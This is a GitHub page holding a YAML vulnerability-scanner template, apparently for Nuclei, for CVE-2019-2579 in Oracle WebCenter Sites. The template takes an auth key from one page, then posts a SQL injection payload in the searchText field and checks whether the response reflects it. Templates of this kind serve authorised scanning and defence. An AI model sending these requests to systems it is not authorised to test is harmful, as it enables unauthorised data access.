forked from cckuailong/reapoc
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2019-2579.yaml
51 lines (43 loc) · 1.74 KB
/
CVE-2019-2579.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
id: CVE-2019-2579
info:
name: Oracle WebCenter Sites - SQL Injection
author: leovalcante
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://github.com/Leovalcante/wcs_scanner
tags: cve,cve2019,oracle,wcs,sqli
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.30
cve-id: CVE-2019-2579
requests:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
Host: {{Hostname}}
- |
POST /cs/ContentServer HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
cookie-reuse: true
extractors:
- type: regex
name: authkey
part: body
internal: true
group: 1
regex:
- "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
matchers-condition: and
matchers:
- type: word
words:
- "value='' and '1'='0 --"
- "Use this utility to view and manage URLs"
condition: and
- type: status
status:
- 200